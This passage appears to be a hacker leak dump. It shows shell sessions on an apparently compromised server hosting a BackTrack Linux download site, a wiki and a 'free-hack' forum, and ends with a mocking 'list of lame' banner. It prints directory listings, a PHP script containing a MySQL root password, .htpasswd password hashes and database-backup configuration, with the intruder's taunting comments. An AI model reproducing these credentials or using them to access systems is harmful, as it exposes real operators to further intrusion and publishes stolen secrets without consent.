03:17 googlehostedservice.html +-rw-r--r--. 1 apache apache 1978856 Sep 17 08:06 hola.jpg +-rw-r--r--. 1 apache apache 2264271 Sep 17 08:12 hola1.jpg +-rw-r--r--. 1 apache apache 2197361 Sep 17 08:15 hola2.jpg +-rw-r--r--. 1 apache apache 315306 Aug 11 03:17 hola22.png +-rw-r--r--. 1 apache apache 169202 Aug 11 03:17 hola23.png +drwxr-xr-x. 8 apache apache 4096 Nov 21 16:38 images +-rw-r--r--. 1 apache apache 3 Aug 11 03:17 index.html +-rw-r--r--. 1 apache apache 397 Dec 9 12:20 index.php +-rw-r--r--. 1 apache apache 321196 Nov 19 15:06 kanji.png +-rw-r--r--. 1 apache apache 147841 Sep 4 12:37 knock-0.5.tar.gz +-rw-r--r--. 1 apache apache 15410 Dec 9 12:20 license.txt +-rw-r--r--. 1 apache apache 48404480 Nov 14 15:53 mediawiki-1.16.0.tar +-rw-r--r--. 1 apache apache 13946 Aug 11 03:17 nv-xorg.conf +-rw-r--r--. 1 apache apache 1382400 Oct 26 10:38 oiopub-direct.tar +-rw-r--r--. 1 apache apache 1508471 Aug 11 03:17 p2270016.jpg +-rw-r--r--. 1 apache apache 1636957 Aug 11 03:17 p2280018.jpg +drwxr-xr-x. 2 apache apache 4096 Nov 22 11:46 patches +-rw-r--r--. 1 apache apache 582 Nov 22 11:21 r2.php +-rw-r--r--. 1 apache apache 9120 Dec 9 12:20 readme.html +-rw-r--r--. 1 apache apache 712 Nov 10 22:27 s.php +-rw-r--r--. 1 apache apache 63 Aug 11 03:17 show.dud.php +-rw-r--r--. 1 apache apache 801 Aug 11 03:17 show.original.php +-rw-r--r--. 1 apache apache 31 Aug 11 03:17 show.php +-rw-r--r--. 1 apache apache 601 Nov 10 22:28 show.stats.working.php +-rw-r--r--. 1 apache apache 38971 Dec 7 23:23 sitemap.xml +-rw-r--r--. 1 apache apache 2485 Dec 7 23:23 sitemap.xml.gz +drwxr-xr-x. 3 apache apache 4096 Aug 11 03:17 slider +-rw-r--r--. 1 apache apache 714372 Aug 11 03:17 spot-the-release.png +-rw-r--r--. 1 apache apache 1536 Aug 11 03:17 stats.php +-rw-r--r--. 1 apache apache 33 Dec 10 03:34 stats.txt +-rw-r--r--. 1 apache apache 23660 Aug 11 03:17 style.css +-rw-r--r--. 1 apache apache 5 Aug 11 03:17 test.php +drwxr-xr-x. 2 apache apache 4096 Nov 22 09:22 torrents +drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 wiki +-rw-r--r--. 1 apache apache 4391 Dec 9 12:20 wp-activate.php +drwxr-xr-x. 8 apache apache 4096 Dec 5 08:12 wp-admin +-rw-r--r--. 1 apache apache 40284 Dec 9 12:20 wp-app.php +-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-atom.php +-rw-r--r--. 1 apache apache 274 Dec 9 12:20 wp-blog-header.php +-rw-r--r--. 1 apache apache 3926 Dec 9 12:20 wp-comments-post.php +-rw-r--r--. 1 apache apache 238 Dec 9 12:20 wp-commentsrss2.php +-rw-r--r--. 1 apache apache 3173 Dec 9 12:20 wp-config-sample.php +-rw-r--r--. 1 apache apache 2696 Nov 22 19:32 wp-config.php +drwxr-xr-x. 9 apache apache 4096 Dec 9 12:21 wp-content +-rw-r--r--. 1 apache apache 1255 Dec 9 12:20 wp-cron.php +-rw-r--r--. 1 apache apache 240 Dec 9 12:20 wp-feed.php +drwxr-xr-x. 8 apache apache 4096 Aug 13 20:06 wp-includes +-rw-r--r--. 1 apache apache 2002 Dec 9 12:20 wp-links-opml.php +-rw-r--r--. 1 apache apache 2441 Dec 9 12:20 wp-load.php +-rw-r--r--. 1 apache apache 26059 Dec 9 12:20 wp-login.php +-rw-r--r--. 1 apache apache 7774 Dec 9 12:20 wp-mail.php +-rw-r--r--. 1 apache apache 487 Dec 9 12:20 wp-pass.php +-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rdf.php +-rw-r--r--. 1 apache apache 316 Dec 9 12:20 wp-register.php +-rw-r--r--. 1 apache apache 218 Dec 9 12:20 wp-rss.php +-rw-r--r--. 1 apache apache 220 Dec 9 12:20 wp-rss2.php +-rw-r--r--. 1 apache apache 9177 Dec 9 12:20 wp-settings.php +-rw-r--r--. 1 apache apache 18695 Dec 9 12:20 wp-signup.php +-rw-r--r--. 1 apache apache 3702 Dec 9 12:20 wp-trackback.php +-rw-r--r--. 1 root root 99665 Nov 24 00:52 wtfff.png +-rw-r--r--. 1 apache apache 85 Nov 20 13:43 x.gif +-rw-r--r--. 1 apache apache 95481 Dec 9 12:20 xmlrpc.php + +$ cat wp-config.php + +$ cat stats.txt +BackTrack 4 - 4916323 downloads + +cat download.php + EVEN IF YOU THINK YOU KNOW WHAT YOU ARE DOING!!! + +function getRealIpAddr() +{ + if (!empty($_SERVER['HTTP_CLIENT_IP'])) //check ip from share internet + { + $ip=$_SERVER['HTTP_CLIENT_IP']; + } + elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) //to check ip is pass from proxy + { + $ip=$_SERVER['HTTP_X_FORWARDED_FOR']; + } + else + { + $ip=$_SERVER['REMOTE_ADDR']; + } + return $ip; +} + +$ip=getRealIpAddr(); + +$username="root"; +$password="234hi2u3d98as7d23kuh"; +$database="counter"; + +function choose($iso) +{ + + $num = Rand (1,5); + switch ($num) + { + case 1: + $link="ftp://ftp.uio.no/pub/security/backtrack/$iso"; + break; + + case 2: + $link="http://ftp.uio.no/pub/security/backtrack/$iso"; + break; + + case 3: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + + case 4: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + + case 5: + $link="http://ftp.halifax.rwth-aachen.de/backtrack/$iso"; + break; + +// case 6: +// $link="http://moon.backtrack-linux.org/downloads/$iso"; +// break; + + + } + + +return $link; + +} + + +$version=$_GET["fname"]; + +if (! (($version=="bt4f") or ($version=="bt4fvm") or ($version=="bt4r1") or ($version=="bt4r1vm") or ($version=="bt3") or ($version=="bt4pf") or ($version=="bt4b") or ($version=="bt4bvm") or ($version=="bt4r2") or ($version=="bt4r2vm"))) + +{ + echo "This page cannot be accessed directly."; + exit; +} + +if ($version=="bt4r2") +{ + + $iso="bt4-r2.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + + +if ($version=="bt4r2vm") +{ + + $iso="bt4-r2-vm.tar.bz2"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + + + +if ($version=="bt4f") +{ + + $iso="bt4-final.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4fvm") +{ + $iso="bt4-final-vm.zip"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4r1") +{ + $iso="bt4-r1.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4r1vm") +{ + $iso="bt4-r1-vm.tar.bz2"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4pf") +{ + $iso="bt4-pre-final.iso"; + $link=choose($iso); + +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4b") +{ + $iso="bt4-beta.iso"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +elseif ($version=="bt4bvm") +{ + $iso="bt4-beta-vm-6.5.1.rar"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +elseif ($version=="bt3") +{ + $iso="bt3-final.iso"; + $link=choose($iso); +mysql_connect("localhost",$username,$password); +@mysql_select_db($database) or die( "Unable to select database"); +$query = "INSERT INTO downloadss VALUES ('',\"$ip\",\"$version\")"; +mysql_query($query); +mysql_close(); + header( "Location: $link "); + exit; +} + +else +{ + exit; +} + +?> + + +$ cat s.php + + +$ cd wiki + +$ ls + +total 700 +drwxr-xr-x. 15 apache apache 4096 Nov 27 16:52 . +drwxr-xr-x. 13 apache apache 4096 Dec 9 12:21 .. +-rw-r--r--. 1 apache apache 23 Nov 14 16:01 .htpasswd +-rw-r--r--. 1 apache apache 17997 Apr 5 2006 COPYING +-rw-r--r--. 1 apache apache 2073 Jul 27 07:29 CREDITS +-rw-r--r--. 1 apache apache 76 Jul 27 2009 FAQ +-rw-r--r--. 1 apache apache 392287 Mar 12 2010 HISTORY +-rw-r--r--. 1 apache apache 96 Nov 14 16:01 HT +-rw-r--r--. 1 apache apache 4138 Apr 18 2008 INSTALL +-rw-r--r--. 1 apache apache 5469 Nov 28 16:45 LocalSettings.php +-rw-r--r--. 1 apache apache 3649 Nov 11 2008 README +-rw-r--r--. 1 apache apache 58431 Jul 28 03:11 RELEASE-NOTES +-rw-r--r--. 1 apache apache 648 May 7 2009 StartProfiler.sample +-rw-r--r--. 1 apache apache 13307 Mar 25 2010 UPGRADE +drwxr-xr-x. 2 root root 4096 Nov 27 16:53 adsense +-rw-r--r--. 1 apache apache 4707 Feb 15 2010 api.php +-rw-r--r--. 1 apache apache 25 Feb 3 2008 api.php5 +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 bin +-rw-r--r--. 1 apache apache 8436 Nov 21 14:24 bt-wiki.png +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 cache +drwxr-xr-x. 2 apache apache 4096 Nov 14 15:58 config +drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 docs +drwxr-xr-x. 4 apache apache 4096 Nov 28 16:44 extensions +drwxr-xr-x. 12 apache apache 4096 Nov 23 12:36 images +-rw-r--r--. 1 apache apache 4031 Oct 14 2009 img_auth.php +-rw-r--r--. 1 apache apache 31 Feb 3 2008 img_auth.php5 +drwxr-xr-x. 16 apache apache 4096 Jul 28 03:16 includes +-rw-r--r--. 1 apache apache 4329 Jan 1 2010 index.php +-rw-r--r--. 1 apache apache 28 Feb 3 2008 index.php5 +drwxr-xr-x. 4 apache apache 4096 Jul 28 03:16 languages +drwxr-xr-x. 13 apache apache 12288 Nov 22 12:55 maintenance +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 math +-rw-r--r--. 1 apache apache 3054 Mar 21 2009 opensearch_desc.php +-rw-r--r--. 1 apache apache 39 Mar 3 2008 opensearch_desc.php5 +-rw-r--r--. 1 apache apache 174 Feb 3 2010 php5.php5 +-rw-r--r--. 1 apache apache 8821 Jul 27 03:40 profileinfo.php +-rw-r--r--. 1 apache apache 383 Mar 21 2009 redirect.php +-rw-r--r--. 1 apache apache 31 Feb 3 2008 redirect.php5 +-rw-r--r--. 1 apache apache 89 Feb 3 2010 redirect.phtml +drwxr-xr-x. 2 apache apache 4096 Jul 28 03:16 serialized +-rwxrwxrwx. 1 root root 6816 Nov 23 18:29 sitemap.xml +drwxr-xr-x. 9 apache apache 4096 Nov 28 14:12 skins +-rw-r--r--. 1 apache apache 4905 Mar 8 2010 thumb.php +-rw-r--r--. 1 apache apache 29 Feb 3 2008 thumb.php5 +-rw-r--r--. 1 apache apache 1347 Nov 5 2008 trackback.php +-rw-r--r--. 1 apache apache 32 Mar 16 2009 trackback.php5 +-rw-r--r--. 1 apache apache 86 Feb 3 2010 wiki.phtml + +$ cat .htpasswd +edbadmin:YE8mle4nG1Z.c + +cd .. +cat forums/includes/config.php + /proc/vz/vzaquota/00000045/aquota.group +lrwxrwxrwx 1 root root 38 Nov 30 02:12 aquota.user -> /proc/vz/vzaquota/00000045/aquota.user +drwx--x--x 3 root root 4096 Nov 13 09:00 backup +drwxr-xr-x 2 root root 4096 Nov 17 00:24 bin +drwxr-xr-x 2 root root 4096 Jan 26 2010 boot +drwxr-xr-x 7 root root 1900 Nov 30 02:12 dev +drwxr-xr-x 68 root root 12288 Dec 8 21:35 etc +drwx--x--x 8 root root 4096 Nov 14 07:11 home +drwxr-xr-x 9 root root 4096 Nov 12 08:24 lib +drwxr-xr-x 7 root root 4096 Nov 12 08:24 lib64 +drwxr-xr-x 2 root root 4096 Jan 26 2010 media +drwxr-xr-x 2 root root 4096 Jan 26 2010 mnt +drwxr-xr-x 10 root root 4096 Nov 12 16:31 opt +dr-xr-xr-x 113 root root 0 Nov 30 02:12 proc +drwxr-x--- 14 root root 4096 Dec 8 21:36 root +drwxr-xr-x 2 root root 4096 Nov 17 00:24 sbin +drwxr-xr-x 5 root root 20480 Dec 8 00:24 scripts +drwxr-xr-x 2 root root 4096 Jan 26 2010 selinux +drwxr-xr-x 2 root root 4096 Jan 26 2010 srv +drwxr-xr-x 3 root root 0 Nov 30 02:12 sys +drwxrwxrwt 10 root root 4096 Dec 8 21:36 tmp +drwxr-xr-x 16 root root 4096 Nov 11 18:17 usr +drwxr-xr-x 22 root root 4096 Nov 11 18:01 var + +$ ls -la /home/freehack/public_html +total 3100 +drwxr-x--- 34 freehack nobody 4096 Dec 4 22:13 . +drwx--x--x 14 freehack freehack 4096 Dec 7 11:15 .. +-rw-r--r-- 1 freehack freehack 1086 Dec 4 22:27 .htaccess +drwxr-xr-x 11 freehack freehack 4096 Nov 14 09:24 2tgh9322132k322l1sd +-rw-r--r-- 1 freehack freehack 6726 Jan 18 2010 LICENSE +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _private +drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:28 _vti_bin +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_cnf +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_log +drwxr-x--- 2 freehack nobody 4096 Nov 14 07:11 _vti_pvt +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 _vti_txt +-rw-r--r-- 1 freehack freehack 19341 Jan 18 2010 accessmask.php +-rw-r--r-- 1 freehack freehack 12687 Jan 18 2010 admin_rbs.php +-rw-r--r-- 1 freehack freehack 2645 Jan 18 2010 admin_rbs_banner_list.php +-rw-r--r-- 1 freehack freehack 3089 Jan 18 2010 admin_rbs_convert.php +-rw-r--r-- 1 freehack freehack 2667 Jan 18 2010 admin_rbs_d_banner_list.php +-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_h_banner_list.php +-rw-r--r-- 1 freehack freehack 2668 Jan 18 2010 admin_rbs_v_banner_list.php +-rw-r--r-- 1 freehack freehack 2681 Jan 18 2010 admin_rbs_x_banner_list.php +-rw-r--r-- 1 freehack freehack 39582 Jan 18 2010 admincalendar.php +-rw-r--r-- 1 freehack freehack 49644 Jan 18 2010 admininfraction.php +-rw-r--r-- 1 freehack freehack 19150 Jan 18 2010 adminlog.php +-rw-r--r-- 1 freehack freehack 8149 Jan 18 2010 adminpermissions.php +-rw-r--r-- 1 freehack freehack 25516 Jan 18 2010 adminreputation.php +-rw-r--r-- 1 freehack freehack 1230 Jan 18 2010 ads.php +-rw-r--r-- 1 freehack freehack 23844 Jan 18 2010 ajax.php +-rw-r--r-- 1 freehack freehack 75511 Jan 18 2010 album.php +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:04 amecache +-rw-r--r-- 1 freehack freehack 17137 Jan 18 2010 announcement.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:04 archive +-rw-r--r-- 1 freehack freehack 18309 Jan 18 2010 attachment.php +-rw-r--r-- 1 freehack freehack 12512 Jan 18 2010 attachmentpermission.php +-rw-r--r-- 1 freehack freehack 80983 Jan 18 2010 automediaembed_admin.php +-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_footer.php +-rw-r--r-- 1 freehack freehack 1979 Jan 18 2010 autorefresh_header.php +-rw-r--r-- 1 freehack freehack 1991 Jan 18 2010 autorefresh_navbar.php +-rw-r--r-- 1 freehack freehack 1430 Jan 18 2010 autotagger_ajax.php +-rw-r--r-- 1 freehack freehack 19355 Jan 18 2010 avatar.php +-rw-r--r-- 1 freehack freehack 46771 Jan 18 2010 banner.png +-rw-r--r-- 1 freehack freehack 16461 Jan 18 2010 bbcode.php +drwxr-xr-x 6 freehack freehack 4096 Nov 14 08:06 bilder +drwxr-xr-x 8 freehack freehack 4096 Nov 25 14:18 blog +-rw-r--r-- 1 freehack freehack 14782 Jan 18 2010 bookmarksite.php +-rw-r--r-- 1 freehack freehack 75327 Jan 18 2010 calendar.php +-rw-r--r-- 1 freehack freehack 12083 Jan 18 2010 calendarpermission.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 07:11 cgi-bin +-rw-r--r-- 1 freehack freehack 43 Jan 18 2010 clear.gif +drwxr-xr-x 4 freehack freehack 4096 Nov 14 08:08 clientscript +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:08 control_examples +-rw-r--r-- 1 freehack freehack 14938 Jan 18 2010 converse.php +drwxr-xr-x 3 freehack freehack 4096 Nov 18 14:14 cpa +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:11 cpm +drwxr-xr-x 7 freehack freehack 4096 Nov 14 08:12 cpstyles +-rw-r--r-- 1 freehack freehack 3317 Jan 18 2010 cron.php +-rw-r--r-- 1 freehack freehack 24049 Jan 18 2010 cronadmin.php +-rw-r--r-- 1 freehack freehack 10734 Jan 18 2010 cronlog.php +-rw-r--r-- 1 freehack freehack 34087 Jan 18 2010 css.php +drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customavatars +drwxrwxrwx 3 freehack freehack 4096 Nov 14 08:13 customgroupicons +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:13 customprofilepics +-rw-r--r-- 1 freehack freehack 21833 Jan 18 2010 diagnostic.php +-rw-r--r-- 1 freehack freehack 47757 Jan 18 2010 editpost.php +-rw-r--r-- 1 freehack freehack 11748 Jan 18 2010 email.php +-rw-r--r-- 1 freehack freehack 29500 Jan 18 2010 external.php +-rw-r--r-- 1 freehack freehack 9786 Jan 18 2010 faq.php +-rw-r--r-- 1 freehack freehack 22486 Jan 18 2010 favicon.ico +-rw-r--r-- 1 freehack freehack 30137 Jan 18 2010 forum.php +-rw-r--r-- 1 freehack freehack 35658 Jan 18 2010 forumdisplay.php +-rw-r--r-- 1 freehack freehack 30063 Jan 18 2010 forumpermission.php +-rw-r--r-- 1 freehack freehack 15499 Oct 11 10:03 gla_test.php +-rw-r--r-- 1 freehack freehack 39830 Jan 18 2010 global.php +-rw-r--r-- 1 freehack freehack 53 Oct 24 14:48 googlef4001cc5b1db090b.html +-rw-r--r-- 1 freehack freehack 137885 Jan 18 2010 group.php +-rw-r--r-- 1 freehack freehack 24919 Jan 18 2010 group_inlinemod.php +-rw-r--r-- 1 freehack freehack 10524 Jan 18 2010 groupsubscription.php +-rw-r--r-- 1 freehack freehack 25922 Jan 18 2010 help.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:13 htaccess +-rw-r--r-- 1 freehack freehack 9047 Jan 18 2010 image.php +drwxr-xr-x 20 freehack freehack 4096 Nov 14 08:51 images +drwxr-xr-x 5 freehack freehack 4096 Nov 14 08:52 img +drwxr-xr-x 7 freehack freehack 12288 Dec 4 22:09 includes +-rw-r--r-- 1 freehack freehack 19592 Jan 18 2010 index.php +-rw-r--r-- 1 freehack freehack 43829 Jan 18 2010 infraction.php +-rw-r--r-- 1 freehack freehack 182759 Jan 18 2010 inlinemod.php +-rw-r--r-- 1 freehack freehack 10342 Jan 18 2010 joinrequests.php +-rw-r--r-- 1 freehack freehack 10222 Jan 18 2010 login.php +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 madp +-rw-r--r-- 1 freehack freehack 17066 Jan 18 2010 member.php +-rw-r--r-- 1 freehack freehack 15931 Jan 18 2010 member_inlinemod.php +-rw-r--r-- 1 freehack freehack 35901 Jan 18 2010 memberlist.php +-rw-r--r-- 1 freehack freehack 23867 Jan 18 2010 misc.php +-rw-r--r-- 1 freehack freehack 63331 Jan 18 2010 moderation.php +-rw-r--r-- 1 freehack freehack 6756 Jan 18 2010 moderator.php +-rw-r--r-- 1 freehack freehack 18477 Jan 18 2010 newattachment.php +-rw-r--r-- 1 freehack freehack 37104 Jan 18 2010 newreply.php +-rw-r--r-- 1 freehack freehack 18911 Jan 18 2010 newthread.php +-rw-r--r-- 1 freehack freehack 5725 Jan 18 2010 nex_stats_tend_classes.php +drwxr-xr-x 9 freehack freehack 4096 Nov 25 18:38 nopaste +-rw-r--r-- 1 freehack freehack 12095 Jul 20 15:01 oks.png +-rw-r--r-- 1 freehack freehack 19604 Jan 18 2010 online.php +-rw-r--r-- 1 freehack freehack 7696 Jan 18 2010 payment_gateway.php +-rw-r--r-- 1 freehack freehack 11910 Jan 18 2010 payments.php +-rw-r--r-- 1 freehack freehack 7889 Jan 18 2010 picture.php +-rw-r--r-- 1 freehack freehack 22040 Jan 18 2010 picture_inlinemod.php +-rw-r--r-- 1 freehack freehack 25311 Jan 18 2010 picturecomment.php +-rw-r--r-- 1 freehack freehack 27415 Jan 18 2010 poll.php +-rw-r--r-- 1 freehack freehack 17744 Jan 18 2010 post_thanks.php +-rw-r--r-- 1 freehack freehack 9512 Jan 18 2010 posthistory.php +-rw-r--r-- 1 freehack freehack 74369 Jan 18 2010 postings.php +-rw-r--r-- 1 freehack freehack 4763 Jan 18 2010 pprm.php +-rw-r--r-- 1 freehack freehack 6594 Jan 18 2010 printthread.php +-rw-r--r-- 1 freehack freehack 70748 Jan 18 2010 private.php +-rw-r--r-- 1 freehack freehack 152336 Jan 18 2010 profile.php +-rw-r--r-- 1 freehack freehack 2712 Feb 3 2010 rbs_banner.php +-rw-r--r-- 1 freehack freehack 39751 Jan 18 2010 register.php +-rw-r--r-- 1 freehack freehack 5688 Jan 18 2010 report.php +-rw-r--r-- 1 freehack freehack 13720 Jan 18 2010 reputation.php +-rw-r--r-- 1 freehack freehack 124717 Jan 18 2010 search.php +-rw-r--r-- 1 freehack freehack 20694 Jan 18 2010 sendmessage.php +-rw-r--r-- 1 freehack freehack 10009 Jan 18 2010 showgroups.php +-rw-r--r-- 1 freehack freehack 11374 Jan 18 2010 showpost.php +-rw-r--r-- 1 freehack freehack 73470 Jan 18 2010 showthread.php +drwxrwxrwx 2 freehack freehack 4096 Nov 14 08:59 signaturepics +drwxr-xr-x 2 freehack freehack 4096 Nov 14 08:59 sitemap +-rw-r--r-- 1 freehack freehack 32848 Jan 18 2010 subscription.php +-rw-r--r-- 1 freehack freehack 51471 Sep 11 14:10 support.php +-rw-r--r-- 1 freehack freehack 13365 Jan 18 2010 tags.php +-rw-r--r-- 1 freehack freehack 8692 Jan 18 2010 threadrate.php +-rw-r--r-- 1 freehack freehack 12415 Jan 18 2010 threadtag.php +drwxrwxrwx 2 freehack freehack 4096 Dec 8 03:30 tmp +-rw-r--r-- 1 freehack freehack 34512 Jan 18 2010 usercp.php +-rw-r--r-- 1 freehack freehack 19098 Jan 18 2010 usernote.php +drwxrwxrwx 7 freehack freehack 4096 Nov 14 09:06 vboptimise +drwxr-xr-x 4 freehack freehack 4096 Dec 4 22:11 vbseo +-rw-r--r-- 1 freehack freehack 45172 Sep 14 01:00 vbseo.php +drwxr-xr-x 4 freehack freehack 4096 Nov 14 09:14 vbseo_sitemap +-rw-r--r-- 1 freehack freehack 4221 Sep 14 01:00 vbseocp.php +-rw-r--r-- 1 freehack freehack 27357 Jan 18 2010 visitormessage.php +-rw-r--r-- 1 freehack freehack 8431 Jan 18 2010 whoquotedme.php +-rw-r--r-- 1 freehack freehack 334 Oct 7 11:32 x.php + + +RETARDED PHP CODE ALERT! + +$ cat x.php + + + + +$ cd 2tgh9322132k322l1sd + +$ ls +total 252 +drwxr-xr-x 11 508 504 4096 Nov 14 09:24 . +drwxr-x--- 34 508 99 4096 Dec 4 22:13 .. +-rw-r--r-- 1 508 504 129 Nov 14 09:24 .htaccess +-rw-r--r-- 1 508 504 42 Nov 14 09:24 .htpasswd +drwxr-xr-x 2 508 504 4096 Nov 14 07:22 ReadMe +-rw-r--r-- 1 508 504 3661 Nov 14 09:20 config.php +-rw-r--r-- 1 508 504 58442 Sep 22 2009 config_overview.php +drwxr-xr-x 4 508 504 4096 Nov 14 07:16 css +-rw-r--r-- 1 508 504 19372 Sep 22 2009 dump.php +-rw-r--r-- 1 508 504 512 Nov 14 09:20 error_log +-rw-r--r-- 1 508 504 22059 Sep 22 2009 filemanagement.php +-rw-r--r-- 1 508 504 640 Sep 22 2009 help.php +drwxr-xr-x 2 508 504 4096 Nov 14 07:17 images +drwxr-xr-x 4 508 504 4096 Nov 14 07:18 inc +-rw-r--r-- 1 508 504 871 Sep 22 2009 index.php +-rw-r--r-- 1 508 504 24781 Sep 22 2009 install.php +drwxr-xr-x 4 508 504 4096 Nov 14 07:18 js +drwxr-xr-x 17 508 504 4096 Nov 14 07:22 language +-rw-r--r-- 1 508 504 5461 Sep 22 2009 log.php +-rw-r--r-- 1 508 504 1256 Sep 22 2009 main.php +-rw-r--r-- 1 508 504 3930 Sep 22 2009 menu.php +drwxr-xr-x 2 508 504 4096 Nov 14 07:22 msd_cron +-rw-r--r-- 1 508 504 776 Sep 22 2009 refresh_dblist.php +-rw-r--r-- 1 508 504 15762 Sep 22 2009 restore.php +-rw-r--r-- 1 508 504 10187 Sep 22 2009 sql.php +drwxr-xr-x 5 508 504 4096 Nov 14 07:22 tpl +drwxrwxrwx 5 508 504 4096 Nov 14 09:20 work + +$ cat .htpasswd +Suicide:$1$GTs9Hns/$lPMGV.EaLgyqwNxgTQSwf1 + +$ cat config.php +1000 +$config['processlist_refresh']=3000; + +$config['empty_db_before_restore']=0; +$config['optimize_tables_beforedump']=1; +$config['stop_with_error']=1; + +// For sending a mail after backup set send_mail to 1, otherless set to 0 +$config['send_mail']=0; +// Attach the backup 0=no 1=yes +$config['send_mail_dump']=0; +// set the recieve adress for the mail +$config['email_recipient']=''; +$config['email_recipient_cc']=''; +// set the sender adress (the script) +$config['email_sender']=''; + +//max. Size of Email-Attach, here 3 MB +$config['email_maxsize1']=3; +$config['email_maxsize2']=2; + +// FTP Server Configuration for Transfer +$config['ftp_transfer'][0]=0; +$config['ftp_timeout'][0]=30; +$config['ftp_useSSL'][0]=0; +$config['ftp_mode'][0]=0; +$config['ftp_server'][0]=''; // Adress of FTP-Server +$config['ftp_port'][0]='21'; // Port +$config['ftp_user'][0]=''; // Username +$config['ftp_pass'][0]=''; // Password +$config['ftp_dir'][0]=''; // Upload-Directory + +$config['ftp_transfer'][1]=0; +$config['ftp_timeout'][1]=30; +$config['ftp_useSSL'][1]=0; +$config['ftp_mode'][1]=0; +$config['ftp_server'][1]=''; +$config['ftp_port'][1]='21'; +$config['ftp_user'][1]=''; +$config['ftp_pass'][1]=''; +$config['ftp_dir'][1]=''; + +$config['ftp_transfer'][2]=0; +$config['ftp_timeout'][2]=30; +$config['ftp_useSSL'][2]=0; +$config['ftp_mode'][2]=0; +$config['ftp_server'][2]=''; +$config['ftp_port'][2]='21'; +$config['ftp_user'][2]=''; +$config['ftp_pass'][2]=''; +$config['ftp_dir'][2]=''; + +//Multipart 0=off 1=on +$config['multi_part']=0; +$config['multipartgroesse1']=1; +$config['multipartgroesse2']=2; +$config['multipart_groesse']=0; + +//Auto-Delete 0=off 1=on +$config['auto_delete']=0; +$config['max_backup_files']=3; + +//configuration file +$config['cron_configurationfile']='mysqldumper.conf.php'; +//path to perl, for windows use e.g. C:perlbinperl.exe +$config['cron_perlpath']='/usr/bin/perl'; +//mailer use sendmail(1) or SMTP(0) +$config['cron_use_sendmail']=1; +//path to sendmail +$sendmail_path=ini_get('sendmail_path'); +$config['cron_sendmail']=$sendmail_path>'' ? $sendmail_path: '/usr/lib/sendmail -t -oi -oem'; + +//adress of smtp-server +$config['cron_smtp']='localhost'; +//smtp-port +$config['cron_smtp_port']=25; +$config['cron_extender']=0; +$config['cron_compression']=1; +$config['cron_printout']=1; +$config['cron_completelog']=1; +$config['cron_comment']=''; +$config['multi_dump']=0; +$config['logcompression']=1; +$config['log_maxsize1']=1; +$config['log_maxsize2']=2; +$config['log_maxsize']=1048576; + + + ________________________ + | |_____ __ + | FREE-HACK LIST OF LAME | |__| |_________ + |________________________| |::| | / + /\**/\ | \.____|::|__| < +( o_o )_ | \::/ \._______\ + (u--u \_) | + (||___ )==\ +,dP"/b/=( /P"/b\ +|8 || 8\=== || 